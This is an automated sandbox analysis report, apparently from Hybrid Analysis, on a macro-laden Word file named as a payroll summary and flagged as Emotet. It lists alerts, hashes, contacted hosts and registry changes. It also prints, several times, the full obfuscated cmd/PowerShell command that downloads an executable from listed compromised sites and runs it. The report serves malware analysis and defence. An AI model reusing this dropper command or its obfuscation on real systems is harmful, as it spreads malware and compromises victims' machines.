09172 Payroll Summary.doc
This report is generated from a file or URL submitted to this webservice on May 17th 2018 14:52:19 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v8.10 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access: Uses network protocols on unusual ports
- Persistence: Spawns a lot of processes
- Network Behavior: Contacts 1 domain and 3 hosts
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators (14)
External Systems
Detected Suricata Alert
- details
- Detected alert "ETPRO TROJAN W32/Emotet CnC Checkin" (SID: 2830701, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
- Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
- source
- Suricata Alerts
- relevance
- 10/10
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
- 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
Sample was identified as malicious by at least one Antivirus engine
- details
- 10/57 Antivirus vendors marked sample as malicious (17% detection rate)
- source
- External System
- relevance
- 8/10
General
The analysis extracted a file that was identified as malicious
- details
- 14/64 Antivirus vendors marked dropped file "57463.exe" as malicious (classified as "GenKryptik.BMLF" with 21% detection rate)
- source
- Binary File
- relevance
- 10/10
The analysis spawned a process that was identified as malicious
- details
- 14/64 Antivirus vendors marked spawned process "57463.exe" (PID: 3220) as malicious (classified as "GenKryptik.BMLF" with 21% detection rate)
- 14/64 Antivirus vendors marked spawned process "cmnmspthrd.exe" (PID: 2240) as malicious (classified as "GenKryptik.BMLF" with 21% detection rate)
- source
- Monitored Target
- relevance
- 10/10
Installation/Persistence
Writes data to a remote process
- details
- "cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
- "cmd.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
- "cmd.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
- "powershell.exe" wrote 32 bytes to a remote process "%PUBLIC%\57463.exe" (Handle: 1592)
- "powershell.exe" wrote 52 bytes to a remote process "%PUBLIC%\57463.exe" (Handle: 1592)
- "powershell.exe" wrote 4 bytes to a remote process "%PUBLIC%\57463.exe" (Handle: 1592)
- "57463.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\cmnmspthrd.exe" (Handle: 464)
- "57463.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\cmnmspthrd.exe" (Handle: 464)
- "57463.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\cmnmspthrd.exe" (Handle: 464)
- source
- API Call
- relevance
- 6/10
Network Related
Malicious artifacts seen in the context of a contacted host
- details
- Found malicious artifacts related to "138.0.120.12": ...
  - URL: http://ifcingenieria.cl/76j4qo/76524.exe (AV positives: 2/67 scanned on 05/17/2018 12:45:20)
  - URL: http://ifcingenieria.cl/76j4qo/ (AV positives: 3/67 scanned on 05/17/2018 11:57:55)
  - URL: http://vertek.cl/ (AV positives: 1/67 scanned on 04/27/2018 15:47:08)
  - URL: http://ifcingenieria.cl/ (AV positives: 3/67 scanned on 04/26/2018 10:45:03)
  - URL: http://ifcingenieria.cl/ni9tsuvgzii (AV positives: 3/67 scanned on 04/25/2018 18:44:00)
  - File SHA256: 3801181d5eec749898527ebc4279741acbc9f82c8aa72f8be272031d67eea76b (AV positives: 10/59 scanned on 04/25/2018 13:51:22)
  - File SHA256: 3f73123b71be81eb666247aaee7f7fb33ffc0160f29c586623067044b6521bb0 (AV positives: 10/70 scanned on 04/25/2018 11:56:13)
  - File SHA256: 77795c8a3c5a8ff8129cb4db828828c53a590f93583fcfb0b1112a4e670c97d4 (AV positives: 1/56 scanned on 05/19/2017 09:54:38)
  - File SHA256: a2cad944f3399bde2a5691c14be8b4f939898b5a97dadd579aff3390cdf3624f (AV positives: 1/56 scanned on 07/19/2016 09:29:10)
- source
- Network Traffic
- relevance
- 10/10
Uses network protocols on unusual ports
- details
- TCP traffic to 81.21.67.85 on port 8080
- source
- Network Traffic
- relevance
- 7/10
Unusual Characteristics
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
Spawns a lot of processes
- details
Spawned process "WINWORD.EXE" with commandline "/n "C:\09172 Payroll Summary.doc""
Spawned process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 
9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (Show Process), Spawned process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))", Spawned process "57463.exe", Spawned process "cmnmspthrd.exe"
- source
- Monitored Target
- relevance
- 8/10
Hiding 4 Malicious Indicators
Suspicious Indicators (13)
External Systems
Detected Suricata Alert
- details
- Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 3/67 reputation engines marked "http://ifcingenieria.cl" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
General
Found a potential E-Mail address in binary/memory
- details
- Pattern match: "lrqjor@acfarihso2squ.eozmftwzaojzglmgx275315aeb"
- Pattern match: "570kmqatvuhjlu@qculdb.8z59uesf7p82066"
- Pattern match: "sczcin3c7bopwqupp@51rtqrehb58ot.rddqrbi"
- Pattern match: "pe9eldtfifdaex@lnwbyu9odpe9.uyy"
- Pattern match: "tn@eilcbetw.ten.mu"
- source
- File/Memory
- relevance
- 3/10
Installation/Persistence
Creates new processes
- details
- "WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1308)
- "cmd.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 84)
- "powershell.exe" is creating a new process (Name: "%PUBLIC%\57463.exe", Handle: 1592)
- "57463.exe" is creating a new process (Name: "%WINDIR%\System32\cmnmspthrd.exe", Handle: 464)
- source
- API Call
- relevance
- 8/10
Drops executable files
- details
- "57463.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "\Device\MountPointManager"
- "powershell.exe" opened "\Device\MountPointManager"
- "57463.exe" opened "\Device\MountPointManager"
- source
- API Call
- relevance
- 5/10
Network Related
Found potential IP address in binary/memory
- details
- "81.21.67.85"
- source
- File/Memory
- relevance
- 3/10
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
System Security
Modifies proxy settings
- details
- "powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- "powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- "cmnmspthrd.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
- "cmnmspthrd.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
- "cmnmspthrd.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
- source
- Registry Access
- relevance
- 10/10
Unusual Characteristics
Contains embedded VBA macros with suspicious keywords
- details
- Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
- Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
- Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
- source
- Static Parser
- relevance
- 10/10
Executes powershell accessing native variables
- details
Process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Indicator: "$pshome"
UID: 00010513-00002408) - source
- Monitored Target
- relevance
- 10/10
Extensive usage of escape characters in the commandline
- details
Process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 
9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (UID: 00010503-00004016, Additional Context: "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = 